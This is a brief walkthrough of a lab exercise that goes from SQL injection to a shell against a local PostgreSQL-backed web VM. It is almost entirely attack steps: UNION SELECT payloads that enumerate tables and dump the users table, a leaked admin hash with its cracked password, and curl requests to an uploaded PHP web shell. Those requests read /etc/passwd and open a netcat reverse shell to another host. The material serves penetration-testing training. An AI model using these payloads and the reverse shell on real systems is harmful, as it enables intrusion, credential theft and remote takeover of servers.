This exercise explains how you can, from a SQL injection, gain access to the administration console, then in the administration console, how you can run commands on the system.
From SQL Injection to Shell(PgSQL) VM Download
http://192.168.216.137/cat.php?id=1'
http://192.168.216.137/cat.php?id=1 ORDER BY 1
http://192.168.216.137/cat.php?id=1 ORDER BY 2
http://192.168.216.137/cat.php?id=1 ORDER BY 3
http://192.168.216.137/cat.php?id=1 ORDER BY 4
http://192.168.216.137/cat.php?id=1 ORDER BY 5
http://192.168.216.137/cat.php?id=-1 UNION SELECT 'a',null,null,null
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,'a',null,null
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,user,null,null
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,current_database(),null,null
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,tablename,null,null FROM pg_tables
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,column_name,null,null FROM information_schema.columns where table_name='users'
http://192.168.216.137/cat.php?id=-1 UNION SELECT null,id||':'||login||':'||password,null,null FROM users
1:admin:8efe310f9ab3efeae8d410a8e0166eb2
P4ssw0rd
curl http://192.168.216.137/admin/uploads/shell.pHP?e=id
curl http://192.168.216.137/admin/uploads/shell.pHP?e=uname+-a
curl http://192.168.216.137/admin/uploads/shell.pHP?e=cat+/etc/passwd
curl http://192.168.216.137/admin/uploads/shell.pHP?e=which+nc
curl http://192.168.216.137/admin/uploads/shell.pHP?e=nc+-nv+192.168.216.128+443+-e+/bin/sh